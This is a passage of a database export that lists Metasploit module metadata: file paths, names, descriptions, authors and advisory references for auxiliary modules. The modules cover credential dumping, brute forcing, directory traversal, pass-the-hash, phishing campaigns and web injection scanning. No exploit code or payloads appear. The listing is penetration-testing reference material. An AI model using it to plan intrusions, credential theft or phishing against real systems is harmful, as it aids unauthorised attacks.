00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/citrix_published_bruteforce.rb","auxiliary","gather/citrix_published_bruteforce","auxiliary/gather/citrix_published_bruteforce","Citrix MetaFrame ICA Published Applications Bruteforcer",300,"This module attempts to brute force program names within the Citrix MetaFrame ICA server.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-5817, OSVDB-50617, URL-http://sh0dan.org/oldfiles/hackingcitrix.html","patrick " 1324,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/coldfusion_pwd_props.rb","auxiliary","gather/coldfusion_pwd_props","auxiliary/gather/coldfusion_pwd_props","ColdFusion 'password.properties' Hash Extraction",300,"This module uses a directory traversal 
vulnerability to extract information such as the password, rdspassword, and ""encrypted"" properties. This module has been tested successfully on ColdFusion 9 and ColdFusion 10. Use actions to select the target ColdFusion version.","Metasploit Framework License (BSD)","f","2013-05-07 00:00:00",,"ColdFusion10","aggressive","t","EDB-25305, OSVDB-93114","HTP, nebulus, sinn3r " 1325,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/corpwatch_lookup_id.rb","auxiliary","gather/corpwatch_lookup_id","auxiliary/gather/corpwatch_lookup_id","CorpWatch Company ID Information Search",300,"This module interfaces with the CorpWatch API to get publicly available info for a company given its CorpWatch ID. If you don't know the CorpWatch ID, please use the corpwatch_lookup_name module first.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://api.corpwatch.org/","Brandon Perry " 1326,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/corpwatch_lookup_name.rb","auxiliary","gather/corpwatch_lookup_name","auxiliary/gather/corpwatch_lookup_name","CorpWatch Company Name Information Search",300,"This module interfaces with the CorpWatch API to get publicly available info for a given company name. Please note that by using the CorpWatch API, you acknowledge the limitations of the data CorpWatch provides, and should always verify the information with the official SEC filings before taking any action.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://api.corpwatch.org/","Brandon Perry " 1327,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/d20pass.rb","auxiliary","gather/d20pass","auxiliary/gather/d20pass","General Electric D20 Password Recovery",300,"The General Electric D20ME and possibly other units (D200?) feature TFTP readable configurations with plaintext passwords. 
This module retrieves the username, password, and authentication level list.","Metasploit Framework License (BSD)","f","2012-01-19 00:00:00",,,"aggressive","t",,"K. Reid Wightman " 1328,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/dns_bruteforce.rb","auxiliary","gather/dns_bruteforce","auxiliary/gather/dns_bruteforce","DNS Bruteforce Enumeration",300,"This module uses a dictionary to perform a bruteforce attack to enumerate hostnames and subdomains available under a given domain.","BSD License","f",,,,"aggressive","t",,"Carlos Perez " 1329,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/dns_info.rb","auxiliary","gather/dns_info","auxiliary/gather/dns_info","DNS Basic Information Enumeration",300,"This module enumerates basic DNS information for a given domain. The module gets information regarding A (addresses), AAAA (IPv6 addresses), NS (name servers), SOA (start of authority) and MX (mail servers) records for a given domain. In addition, this module retrieves information stored in TXT records.","BSD License","f",,,,"aggressive","t",,"Carlos Perez " 1330,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/dns_reverse_lookup.rb","auxiliary","gather/dns_reverse_lookup","auxiliary/gather/dns_reverse_lookup","DNS Reverse Lookup Enumeration",300,"This module performs DNS reverse lookups against a given IP range in order to retrieve valid addresses and names.","BSD License","f",,,,"aggressive","t",,"Carlos Perez " 1331,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/dns_srv_enum.rb","auxiliary","gather/dns_srv_enum","auxiliary/gather/dns_srv_enum","DNS Common Service Record Enumeration",300,"This module enumerates common DNS service records in a given domain. By setting ALL_DNS to true, all the name servers of a given domain are used for enumeration. Otherwise only the system DNS is used for enumeration. 
In order to get all the available name servers for the given domain, the SOA and NS records are queried. To convert domain names to IP addresses, queries for A and AAAA (IPv6) records are used.","BSD License","f",,,,"aggressive","t",,"Carlos Perez " 1332,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/eaton_nsm_creds.rb","auxiliary","gather/eaton_nsm_creds","auxiliary/gather/eaton_nsm_creds","Network Shutdown Module <= 3.21 (sort_values) Credential Dumper",300,"This module will extract user credentials from Network Shutdown Module by exploiting a vulnerability found in lib/dbtools.inc, which uses unsanitized user input inside an eval() call. Please note that in order to extract credentials, the vulnerable service must have at least one USV module (an entry in the ""nodes"" table in mgedb.db).","Metasploit Framework License (BSD)","f","2012-06-26 00:00:00",,,"aggressive","t","OSVDB-83199, URL-http://secunia.com/advisories/49103/","h0ng10, sinn3r " 1333,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/enum_dns.rb","auxiliary","gather/enum_dns","auxiliary/gather/enum_dns","DNS Record Scanner and Enumerator",300,"This module can be used to gather information about a domain from a given DNS server by performing various DNS queries such as zone transfers, reverse lookups, SRV record bruteforcing, and other techniques.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0532, OSVDB-492","Carlos Perez " 1334,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/external_ip.rb","auxiliary","gather/external_ip","auxiliary/gather/external_ip","Discover External IP via Ifconfig.me",300,"This module checks for the public source IP address of the current route to the RHOST by querying the public web application at ifconfig.me. 
It should be noted that this module will register activity on ifconfig.me, which is not affiliated with Metasploit.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://ifconfig.me/ip","RageLtMan" 1335,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/impersonate_ssl.rb","auxiliary","gather/impersonate_ssl","auxiliary/gather/impersonate_ssl","HTTP SSL Certificate Impersonation",300,"This module requests a copy of the remote SSL certificate and creates a local (self-signed) version using the information from the remote version. The module then outputs (PEM|DER) format private key / certificate and a combined version for use in Apache or other Metasploit modules requiring SSLCert. Inputs for private key / CA cert have been provided for those with DigiNotar certs hanging about!","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.slideshare.net/ChrisJohnRiley/ssl-certificate-impersonation-for-shits-andgiggles","Chris John Riley" 1336,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/natpmp_external_address.rb","auxiliary","gather/natpmp_external_address","auxiliary/gather/natpmp_external_address","NAT-PMP External Address Scanner",300,"Scan NAT devices for their external address using NAT-PMP.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Jon Hart " 1337,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/search_email_collector.rb","auxiliary","gather/search_email_collector","auxiliary/gather/search_email_collector","Search Engine Domain Email Address Collector",300,"This module uses Google, Bing and Yahoo to create a list of valid email addresses for the target domain.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Carlos Perez " 1338,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/shodan_search.rb","auxiliary","gather/shodan_search","auxiliary/gather/shodan_search","Shodan 
Search",300,"This module uses the SHODAN API to query the database and returns the first 50 IPs. SHODAN accounts are free, and output can be sent to a file for use by another program. Results can also be populated into the services table in the database. NOTE: SHODAN filters (port, hostname, os, geo, city) can be used in queries, but the free API does not allow net, country, before, and after filters. An unlimited API key can be purchased from the Shodan site to use those queries. The 50 result limit can also be raised to 10,000 for a small fee. API: http://www.shodanhq.com/api_doc FILTERS: http://www.shodanhq.com/help/filters","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"John Sawyer , sinn3r " 1339,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb","auxiliary","gather/wp_w3_total_cache_hash_extract","auxiliary/gather/wp_w3_total_cache_hash_extract","W3-Total-Cache Wordpress-plugin 0.9.2.4 (or before) Username and Hash Extract",300,"The W3-Total-Cache Wordpress Plugin <= 0.9.2.4 can cache database statements and its results in files for fast access. Version 0.9.2.4 was fixed afterwards, so it may still be vulnerable. These cache files are in the webroot of the Wordpress installation and can be downloaded if the name is guessed. This module tries to locate them with brute force in order to find usernames and password hashes in these files. W3 Total Cache must be configured with Database Cache enabled and Database Cache Method set to Disk to be vulnerable.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-88744, URL-http://seclists.org/fulldisclosure/2012/Dec/242","Christian Mehlmauer , Jason A. 
Donenfeld " 1340,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/gather/xbmc_traversal.rb","auxiliary","gather/xbmc_traversal","auxiliary/gather/xbmc_traversal","XBMC Web Server Directory Traversal",300,"This module exploits a directory traversal bug in XBMC 11, up until the 2012-11-04 nightly build. The module can only be used to retrieve files.","Metasploit Framework License (BSD)","f","2012-11-04 00:00:00",,,"aggressive","t","URL-http://forum.xbmc.org/showthread.php?tid=144110&pid=1227348, URL-http://www.ioactive.com/pdfs/Security_Advisory_XBMC.pdf, URL-https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335","Lucas ""acidgen"" Lundgren IOActive, Matt ""hostess"" Andreko , sinn3r " 1341,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/pdf/foxit/authbypass.rb","auxiliary","pdf/foxit/authbypass","auxiliary/pdf/foxit/authbypass","Foxit Reader Authorization Bypass",300,"This module exploits an authorization bypass vulnerability in Foxit Reader build 1120. 
When an attacker creates a specially crafted PDF file containing an Open/Execute action, arbitrary commands can be executed without confirmation from the victim.","Metasploit Framework License (BSD)","f","2009-03-09 00:00:00",,,"aggressive","t","BID-34035, CVE-2009-0836, OSVDB-55615","Didier Stevens , MC " 1342,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/bruteforce.rb","auxiliary","pro/bruteforce","auxiliary/pro/bruteforce","PRO: Brute Force Authentication",300,"Gain access to various services using brute force modules","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1343,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/cleanup.rb","auxiliary","pro/cleanup","auxiliary/pro/cleanup","PRO: Compromised Host Cleanup",300,"Shut down sessions and clean up user actions","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1344,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/collect.rb","auxiliary","pro/collect","auxiliary/pro/collect","PRO: Compromised Host Data Collection",300,"Collect information from compromised systems","Rapid7 Proprietary","f",,,,"aggressive","t",,"thelightcosine" 1345,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/discover.rb","auxiliary","pro/discover","auxiliary/pro/discover","PRO: Host and Service Discovery",300,"Locate hosts and services","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1346,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/download.rb","auxiliary","pro/download","auxiliary/pro/download","PRO: Download a File",300,"Download a specific file path through a session","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1347,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/exploit.rb","auxiliary","pro/exploit","auxiliary/pro/exploit","PRO: Exploitation",300,"Gain access to systems using exploits","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1348,"2013-05-30 
16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/handler.rb","auxiliary","pro/handler","auxiliary/pro/handler","PRO: Payload Handler",300,"Starts an instance of exploit/multi/handler","Rapid7 Proprietary","f",,,,"aggressive","t",,"egypt " 1349,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/import.rb","auxiliary","pro/import","auxiliary/pro/import","PRO: Data Importer",300,"Process a data file","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1350,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/import_creds.rb","auxiliary","pro/import_creds","auxiliary/pro/import_creds","PRO: Credential Importer",300,"Import credential files: user lists, password lists, userpass lists, and pwdump files","Rapid7 Proprietary","f",,,,"aggressive","t",,"todb " 1351,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/listener.rb","auxiliary","pro/listener","auxiliary/pro/listener","PRO: Payload Listener",300,"Starts a pre-configured payload listener","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1352,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/minions/creds_exploiter.rb","auxiliary","pro/minions/creds_exploiter","auxiliary/pro/minions/creds_exploiter","PRO: Credential Exploiter",300,"Command and Control for the Credential Exploiter Minion","Rapid7 Proprietary","f",,,,"aggressive","t",,"thelightcosine" 1353,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/minions/hash_key_recycler.rb","auxiliary","pro/minions/hash_key_recycler","auxiliary/pro/minions/hash_key_recycler","PRO: SMB Hash/SSH Key Recycler",300,"Command and Control for the Hash/Key Recycler Minion","Rapid7 Proprietary","f",,,,"aggressive","t",,"thelightcosine" 1354,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/minions/pass_the_hash.rb","auxiliary","pro/minions/pass_the_hash","auxiliary/pro/minions/pass_the_hash","PRO: Pass the Hash",300,"Command and Control for Pass the Hash 
Minion","Rapid7 Proprietary","f",,,,"aggressive","t",,"thelightcosine" 1355,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/minions/password_recycler.rb","auxiliary","pro/minions/password_recycler","auxiliary/pro/minions/password_recycler","PRO: Password Recycler",300,"Command and Control for the Password Recycler Minion","Rapid7 Proprietary","f",,,,"aggressive","t",,"thelightcosine" 1356,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/minions/ssh_key_recycler.rb","auxiliary","pro/minions/ssh_key_recycler","auxiliary/pro/minions/ssh_key_recycler","PRO: SSH Key Recycler",300,"Command and Control for the SSH Key Recycler Minion","Rapid7 Proprietary","f",,,,"aggressive","t",,"thelightcosine" 1357,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/nexpose.rb","auxiliary","pro/nexpose","auxiliary/pro/nexpose","PRO: Nexpose Scanner Integration",300,"Launch scans in a Nexpose instance, retrieve and import the data","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1358,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/nexpose_asset_group_push.rb","auxiliary","pro/nexpose_asset_group_push","auxiliary/pro/nexpose_asset_group_push","PRO: Nexpose Asset Group Push",300,"Create asset groups within Nexpose","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1359,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/nexpose_exception_push.rb","auxiliary","pro/nexpose_exception_push","auxiliary/pro/nexpose_exception_push","PRO: Nexpose Exception Push",300,"Create vulnerability exceptions within Nexpose","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1360,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/normalize.rb","auxiliary","pro/normalize","auxiliary/pro/normalize","PRO: Host Information Normalizer",300,"Make host and service information consistent","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1361,"2013-05-30 
16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/replay.rb","auxiliary","pro/replay","auxiliary/pro/replay","PRO: Replay All Successful Attacks",300,"Attempt to exploit all previously identified vulnerabilities","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1362,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/report.rb","auxiliary","pro/report","auxiliary/pro/report","PRO: Multiformat Report Generator",300,"Generate reports on the current workspace","Rapid7 Proprietary","f",,,,"aggressive","t",,"egypt , todb " 1363,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/single.rb","auxiliary","pro/single","auxiliary/pro/single","PRO: Single Module Execution Agent",300,"Launch a specific module against one or more systems","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1364,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/social_engineering/campaign_commander.rb","auxiliary","pro/social_engineering/campaign_commander","auxiliary/pro/social_engineering/campaign_commander","PRO: Social Engineering Campaign Commander Module",300,"Command-and-control module for Social Engineering Campaign components","Rapid7 Proprietary","f",,,,"aggressive","t",,"Rapid7" 1365,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/social_engineering/email_track.rb","auxiliary","pro/social_engineering/email_track","auxiliary/pro/social_engineering/email_track","Pro: Campaigns - HTTP Email Track Dummy Server",300,"Spins up the HTTP server for email-only campaigns","Rapid7 Proprietary","f",,,,"aggressive","t",,"TheLightCosine " 1366,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/social_engineering/portable_file_generate.rb","auxiliary","pro/social_engineering/portable_file_generate","auxiliary/pro/social_engineering/portable_file_generate","PRO: Social Engineering Portable File Creator",300,"Create a payload for the given Portable File","Rapid7 
Proprietary","f",,,,"aggressive","t",,"thelightcosine" 1367,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/social_engineering/send_email.rb","auxiliary","pro/social_engineering/send_email","auxiliary/pro/social_engineering/send_email","PRO: Social Engineering Emailer",300,"Conduct a social engineering attack via email to every address associated with the given Campaign","Rapid7 Proprietary","f",,,,"aggressive","t",,"Rapid7" 1368,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/social_engineering/usb_key_generate_exe.rb","auxiliary","pro/social_engineering/usb_key_generate_exe","auxiliary/pro/social_engineering/usb_key_generate_exe","PRO: Social Engineering Payload Creator",300,"Create an executable payload for the given usb key","Rapid7 Proprietary","f",,,,"aggressive","t",,"egypt " 1369,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/social_engineering/web_file.rb","auxiliary","pro/social_engineering/web_file","auxiliary/pro/social_engineering/web_file","Pro: Campaigns - HTTP File Server",300,"Serves up a File via HTTP","Rapid7 Proprietary","f",,,,"aggressive","t",,"TheLightCosine " 1370,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/social_engineering/web_phish.rb","auxiliary","pro/social_engineering/web_phish","auxiliary/pro/social_engineering/web_phish","Pro: Campaigns - HTTP Click Tracking",300,"Track incoming clicks from a campaign","Rapid7 Proprietary","f",,,,"aggressive","t",,"Rapid7" 1371,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/tunnel.rb","auxiliary","pro/tunnel","auxiliary/pro/tunnel","PRO: Tunnel",300,"Creates a tunnel through a specific session for an address range","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1372,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/upgrade_sessions.rb","auxiliary","pro/upgrade_sessions","auxiliary/pro/upgrade_sessions","PRO: Win32 CMD shell Upgrade",300,"Upgrade a Win32 CMD 
Shell to Meterpreter","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm , jduck , thelightcosine" 1373,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/upload.rb","auxiliary","pro/upload","auxiliary/pro/upload","PRO: Upload a File",300,"Upload a specific file to a target","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1374,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/vhost_discover.rb","auxiliary","pro/vhost_discover","auxiliary/pro/vhost_discover","PRO: Virtual host discovery module",300,"Discover distinct virtual host (vhost) records for a specific IP address.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1375,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/web/nada_proxy.rb","auxiliary","pro/web/nada_proxy","auxiliary/pro/web/nada_proxy","PRO: Not a proxy web server",300,"Start a web server that pseudo-proxies calls","Rapid7 Proprietary","f",,,,"aggressive","t",,"lance" 1376,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/web_ssl_scan.rb","auxiliary","pro/web_ssl_scan","auxiliary/pro/web_ssl_scan","PRO: Web SSL Scan Module",300,"Scans a web server for SSL support. It checks to ensure that SSL is supported. It also checks if weak ciphers are supported by the server. 
It reports a Web Vuln if weak ciphers are supported or there is no SSL Support.","Rapid7 Proprietary","f",,,,"aggressive","t",,"thelightcosine" 1377,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit.rb","auxiliary","pro/webaudit","auxiliary/pro/webaudit","PRO: Web Application Auditor",300,"Identify web application vulnerabilities","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm , tasos" 1378,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/cmd.rb","auxiliary","pro/webaudit/cmd","auxiliary/pro/webaudit/cmd","PRO: OS command injection module",300,"Identifies OS shell command injection vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1379,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/cmd_blind_timing.rb","auxiliary","pro/webaudit/cmd_blind_timing","auxiliary/pro/webaudit/cmd_blind_timing","PRO: OS command injection module (timing)",300,"Identifies OS shell command injection vulnerabilities using timing attacks.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1380,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/direct_object_reference.rb","auxiliary","pro/webaudit/direct_object_reference","auxiliary/pro/webaudit/direct_object_reference","PRO: Direct Object Reference module",300,"Identifies Direct Object Reference vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1381,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/ldapi.rb","auxiliary","pro/webaudit/ldapi","auxiliary/pro/webaudit/ldapi","PRO: LDAP injection module",300,"Identifies LDAP injection vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1382,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/lfi.rb","auxiliary","pro/webaudit/lfi","auxiliary/pro/webaudit/lfi","PRO: Local file inclusion module",300,"Identifies local file inclusion vulnerabilities.","Rapid7 
Proprietary","f",,,,"aggressive","t",,"tasos" 1383,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/php_eval.rb","auxiliary","pro/webaudit/php_eval","auxiliary/pro/webaudit/php_eval","PRO: PHP code injection module",300,"Identifies PHP code injection vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1384,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/php_eval_timing.rb","auxiliary","pro/webaudit/php_eval_timing","auxiliary/pro/webaudit/php_eval_timing","PRO: PHP code injection module (timing)",300,"Identifies PHP code injection vulnerabilities using timing attacks.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1385,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/rfi.rb","auxiliary","pro/webaudit/rfi","auxiliary/pro/webaudit/rfi","PRO: Remote file inclusion module",300,"Identifies remote file inclusion vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1386,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/session_fixation.rb","auxiliary","pro/webaudit/session_fixation","auxiliary/pro/webaudit/session_fixation","PRO: Session fixation module",300,"Identifies session fixation vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1387,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/sqli.rb","auxiliary","pro/webaudit/sqli","auxiliary/pro/webaudit/sqli","PRO: SQL injection module",300,"Identifies SQL injection vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1388,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/sqli_blind_differential.rb","auxiliary","pro/webaudit/sqli_blind_differential","auxiliary/pro/webaudit/sqli_blind_differential","PRO: SQL injection module (differential)",300,"Identifies SQL injection vulnerabilities using pairs of fault/boolean injections and differential analysis.","Rapid7 
Proprietary","f",,,,"aggressive","t",,"tasos" 1389,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/sqli_blind_timing_mssql.rb","auxiliary","pro/webaudit/sqli_blind_timing_mssql","auxiliary/pro/webaudit/sqli_blind_timing_mssql","PRO: MSSQL SQL injection module (timing)",300,"Identifies MSSQL SQL injection vulnerabilities using timing attacks.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1390,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/sqli_blind_timing_mysql.rb","auxiliary","pro/webaudit/sqli_blind_timing_mysql","auxiliary/pro/webaudit/sqli_blind_timing_mysql","PRO: MySQL blind SQL injection module (timing)",300,"Identifies SQL injection vulnerabilities for MySQL using timing attacks.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1391,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/sqli_blind_timing_postgres.rb","auxiliary","pro/webaudit/sqli_blind_timing_postgres","auxiliary/pro/webaudit/sqli_blind_timing_postgres","PRO: Postgres blind SQL injection module (timing)",300,"Identifies SQL injection vulnerabilities using timing attacks.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1392,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/unvalidated_redirect.rb","auxiliary","pro/webaudit/unvalidated_redirect","auxiliary/pro/webaudit/unvalidated_redirect","PRO: Unvalidated redirect module",300,"Identifies unvalidated redirect vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1393,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/xpath_injection.rb","auxiliary","pro/webaudit/xpath_injection","auxiliary/pro/webaudit/xpath_injection","PRO: XPATH injection module",300,"Identifies XPATH injection vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1394,"2013-05-30 
16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/xss.rb","auxiliary","pro/webaudit/xss","auxiliary/pro/webaudit/xss","PRO: XSS module",300,"Identifies XSS vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1395,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/xss_event.rb","auxiliary","pro/webaudit/xss_event","auxiliary/pro/webaudit/xss_event","PRO: XSS in event attribute module",300,"Identifies XSS vulnerabilities in event attributes of elements.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1396,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/xss_script_tag.rb","auxiliary","pro/webaudit/xss_script_tag","auxiliary/pro/webaudit/xss_script_tag","PRO: XSS in script element.",300,"Identifies XSS vulnerabilities in script elements.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1397,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/xss_tag.rb","auxiliary","pro/webaudit/xss_tag","auxiliary/pro/webaudit/xss_tag","PRO: XSS in element tag.",300,"Identifies XSS vulnerabilities in tags of elements.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1398,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webcollect_file_inclusion.rb","auxiliary","pro/webcollect_file_inclusion","auxiliary/pro/webcollect_file_inclusion","PRO: WebApp collect module (using Local File Inclusion vulnerabilities)",300,"Leverages Local File Inclusion WebApp vulnerabilities to facilitate exfiltration of server-side files.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1399,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan.rb","auxiliary","pro/webscan","auxiliary/pro/webscan","PRO: Web Application Scanner",300,"Locate web applications and identify forms","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm , tasos" 1400,"2013-05-30 
16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/awstats_configdir_exec.rb","auxiliary","pro/webscan/awstats_configdir_exec","auxiliary/pro/webscan/awstats_configdir_exec","PRO: Awstats detection module (v6.1-v6.2) [awstats_configdir_exec]",300,"Identifies vulnerable versions of Awstats.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1401,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/awstats_migrate_exec.rb","auxiliary","pro/webscan/awstats_migrate_exec","auxiliary/pro/webscan/awstats_migrate_exec","PRO: Awstats detection module (v6.4-v6.5) [awstats_migrate_exec]",300,"Identifies vulnerable versions of Awstats.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1402,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/basilic_diff_exec.rb","auxiliary","pro/webscan/basilic_diff_exec","auxiliary/pro/webscan/basilic_diff_exec","PRO: Basilic detection module (v1.5.14) 